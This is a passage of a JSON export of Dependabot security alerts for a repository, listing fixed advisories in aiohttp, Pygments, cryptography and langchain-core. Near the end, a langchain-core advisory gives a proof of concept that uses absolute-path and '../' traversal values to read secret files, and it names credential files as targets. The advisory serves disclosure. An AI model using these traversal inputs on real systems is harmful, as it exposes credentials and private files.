https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b","severity":"low","identifiers":[{"value":"GHSA-mwh4-6h8g-pg8w","type":"GHSA"},{"value":"CVE-2026-34519","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34519"},{"url":"https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-mwh4-6h8g-pg8w"}],"published_at":"2026-04-01T21:48:24Z","updated_at":"2026-04-01T21:48:25Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/48","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/48","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":47,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-966j-vmvw-g2g9","cve_id":"CVE-2026-34518","summary":"AIOHTTP leaks Cookie and Proxy-Authorization headers on cross-origin redirect","description":"### Summary\n\nWhen following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.\n\n### Impact\n\nThe Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6","severity":"low","identifiers":[{"value":"GHSA-966j-vmvw-g2g9","type":"GHSA"},{"value":"CVE-2026-34518","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34518"},{"url":"https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-966j-vmvw-g2g9"}],"published_at":"2026-04-01T21:47:46Z","updated_at":"2026-04-24T20:33:20Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00041,"percentile":0.12317},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/47","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/47","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":46,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3wq7-rqq7-wx6j","cve_id":"CVE-2026-34517","summary":"AIOHTTP has late size enforcement for non-file multipart fields causes memory DoS","description":"### Summary\n\nFor some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.\n\n### Impact\n\nIf an application uses `Request.post()` an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145","severity":"low","identifiers":[{"value":"GHSA-3wq7-rqq7-wx6j","type":"GHSA"},{"value":"CVE-2026-34517","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34517"},{"url":"https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-3wq7-rqq7-wx6j"}],"published_at":"2026-04-01T21:47:07Z","updated_at":"2026-04-01T21:47:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17179},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/46","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/46","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":45,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-m5qp-6w8w-w647","cve_id":"CVE-2026-34516","summary":"AIOHTTP has a Multipart Header Size Bypass","description":"### Summary\n\nA response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.\n\n### Impact\n\nMultipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. 
However, other restrictions in place limit the impact of this vulnerability.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f","severity":"medium","identifiers":[{"value":"GHSA-m5qp-6w8w-w647","type":"GHSA"},{"value":"CVE-2026-34516","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34516"},{"url":"https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-m5qp-6w8w-w647"}],"published_at":"2026-04-01T21:43:07Z","updated_at":"2026-04-06T23:12:07Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/45","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/45","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":44,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-p998-jp59-783m","cve_id":"CVE-2026-34515","summary":"AIOHTTP affected by UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows","description":"### Summary\n\nOn Windows the static resource handler may expose information about a NTLMv2 remote path.\n\n### Impact\n\nIf an application is running on Windows, and using aiohttp's static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user's credentials from there.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d","severity":"medium","identifiers":[{"value":"GHSA-p998-jp59-783m","type":"GHSA"},{"value":"CVE-2026-34515","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"},{"url":"https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34515"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-p998-jp59-783m"}],"published_at":"2026-04-01T21:26:36Z","updated_at":"2026-04-06T16:47:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00066,"percentile":0.20264},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"},{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/44","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/44","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":43,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2vrm-gr82-f7m5","cve_id":"CVE-2026-34514","summary":"AIOHTTP has CRLF injection through multipart part content type header construction","description":"### Summary\n\nAn attacker who controls the `content_type` parameter in aiohttp could use this to inject extra headers or similar exploits.\n\n### Impact\n\nIf an application allows untrusted data to be used for the multipart `content_type` parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06","severity":"low","identifiers":[{"value":"GHSA-2vrm-gr82-f7m5","type":"GHSA"},{"value":"CVE-2026-34514","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"},{"url":"https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34514"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-2vrm-gr82-f7m5"}],"published_at":"2026-04-01T21:20:06Z","updated_at":"2026-04-06T16:46:52Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/43","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/43","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":42,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-hcc4-c3v8-rx92","cve_id":"CVE-2026-34513","summary":"AIOHTTP Affected by Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector","description":"### Summary\n\nAn unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.\n\n### Impact\n\nIf an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98","severity":"low","identifiers":[{"value":"GHSA-hcc4-c3v8-rx92","type":"GHSA"},{"value":"CVE-2026-34513","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"},{"url":"https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34513"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-hcc4-c3v8-rx92"}],"published_at":"2026-04-01T21:19:22Z","updated_at":"2026-04-06T16:46:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/42","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/42","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":41,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-w2fm-2cpv-w7v5","cve_id":"CVE-2026-22815","summary":"aiohttp allows unlimited trailer headers, leading to possible uncapped memory usage","description":"### Summary\n\nInsufficient restrictions in header/trailer handling could cause uncapped memory usage.\n\n### Impact\n\nAn application could cause memory exhaustion when receiving an attacker controlled request or response. 
A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36","severity":"medium","identifiers":[{"value":"GHSA-w2fm-2cpv-w7v5","type":"GHSA"},{"value":"CVE-2026-22815","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"},{"url":"https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22815"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-w2fm-2cpv-w7v5"}],"published_at":"2026-04-01T19:45:17Z","updated_at":"2026-04-06T16:46:37Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":6.9}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/41","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/41","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":40,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"Pygments"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-5239-wwwm-4pmq","cve_id":"CVE-2026-4539","summary":"Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching","description":"A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. 
The project was informed of the problem early through an issue report but has not responded yet.","severity":"low","identifiers":[{"value":"GHSA-5239-wwwm-4pmq","type":"GHSA"},{"value":"CVE-2026-4539","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-4539"},{"url":"https://github.com/pygments/pygments/issues/3058"},{"url":"https://github.com/pygments/pygments"},{"url":"https://vuldb.com/?ctiid.352327"},{"url":"https://vuldb.com/?id.352327"},{"url":"https://vuldb.com/?submit.774685"},{"url":"https://github.com/pygments/pygments/pull/3064"},{"url":"https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc"},{"url":"https://github.com/pygments/pygments/releases/tag/2.20.0"},{"url":"https://github.com/advisories/GHSA-5239-wwwm-4pmq"}],"published_at":"2026-03-22T06:30:15Z","updated_at":"2026-03-30T14:40:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","score":1.9}},"epss":{"percentage":7.0e-05,"percentile":0.00646},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-1333","name":"Inefficient Regular Expression Complexity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 
2.20.0","first_patched_version":{"identifier":"2.20.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/40","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/40","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":39,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-m959-cc7f-wv43","cve_id":"CVE-2026-34073","summary":"cryptography has incomplete DNS name constraint enforcement on peer names","description":"## Summary\n\nIn versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the \"peer name\" presented during each validation. Consequently, cryptography would allow a peer named `bar.example.com` to validate against a wildcard leaf certificate for `*.example.com`, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for `bar.example.com`.\n\nThis behavior resulted from a gap between RFC 5280 (which defines Name Constraint semantics) and RFC 9525 (which defines service identity semantics): put together, neither states definitively whether Name Constraints should be applied to peer names. To close this gap, cryptography now conservatively rejects any validation where the peer name would be rejected by a name constraint if it were a SAN instead.\n\nIn practice, exploitation of this bypass requires an uncommon X.509 topology, one that the Web PKI avoids because it exhibits these kinds of problems. 
Consequently, we consider this a medium-to-low impact severity.\n\nSee CVE-2025-61727 for a similar bypass in Go's `crypto/x509`.\n\n## Remediation\n\nUsers should upgrade to 46.0.6 or newer. \n\n## Attribution\n\nReporter: @1seal","severity":"low","identifiers":[{"value":"GHSA-m959-cc7f-wv43","type":"GHSA"},{"value":"CVE-2026-34073","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34073"},{"url":"https://github.com/advisories/GHSA-m959-cc7f-wv43"}],"published_at":"2026-03-27T19:56:21Z","updated_at":"2026-04-06T23:13:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":1.7}},"epss":{"percentage":9.0e-05,"percentile":0.0084},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-295","name":"Improper Certificate Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 
46.0.6","first_patched_version":{"identifier":"46.0.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/39","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/39","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":38,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-qh6h-p6c9-ff54","cve_id":"CVE-2026-34070","summary":"LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions","description":"## Summary\n\nMultiple functions in `langchain_core.prompts.loading` read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to `load_prompt()` or `load_prompt_from_config()`, an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (`.txt` for templates, `.json`/`.yaml` for examples).\n\n**Note:** The affected functions (`load_prompt`, `load_prompt_from_config`, and the `.save()` method on prompt classes) are undocumented legacy APIs. They are superseded by the `dumpd`/`dumps`/`load`/`loads` serialization APIs in `langchain_core.load`, which do not perform filesystem reads and use an allowlist-based security model. 
As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.\n\n## Affected component\n\n**Package:** `langchain-core`\n**File:** `langchain_core/prompts/loading.py`\n**Affected functions:** `_load_template()`, `_load_examples()`, `_load_few_shot_prompt()`\n\n## Severity\n\n**High** \n\nThe score reflects the file-extension constraints that limit which files can be read.\n\n## Vulnerable code paths\n\n| Config key | Loaded by | Readable extensions |\n|---|---|---|\n| `template_path`, `suffix_path`, `prefix_path` | `_load_template()` | `.txt` |\n| `examples` (when string) | `_load_examples()` | `.json`, `.yaml`, `.yml` |\n| `example_prompt_path` | `_load_few_shot_prompt()` | `.json`, `.yaml`, `.yml` |\n\nNone of these code paths validated the supplied path against absolute path injection or `..` traversal sequences before reading from disk.\n\n## Impact\n\nAn attacker who controls or influences the prompt configuration dict can read files outside the intended directory:\n\n- **`.txt` files:** cloud-mounted secrets (`/mnt/secrets/api_key.txt`), `requirements.txt`, internal system prompts\n- **`.json`/`.yaml` files:** cloud credentials (`~/.docker/config.json`, `~/.azure/accessTokens.json`), Kubernetes manifests, CI/CD configs, application settings\n\nThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose `load_prompt_from_config()`.\n\n## Proof of concept\n\n```python\nfrom langchain_core.prompts.loading import load_prompt_from_config\n\n# Reads /tmp/secret.txt via absolute path injection\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"/tmp/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\nprint(prompt.template) # file contents disclosed\n\n# Reads ../../etc/secret.txt via directory traversal\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"../../etc/secret.txt\",\n 
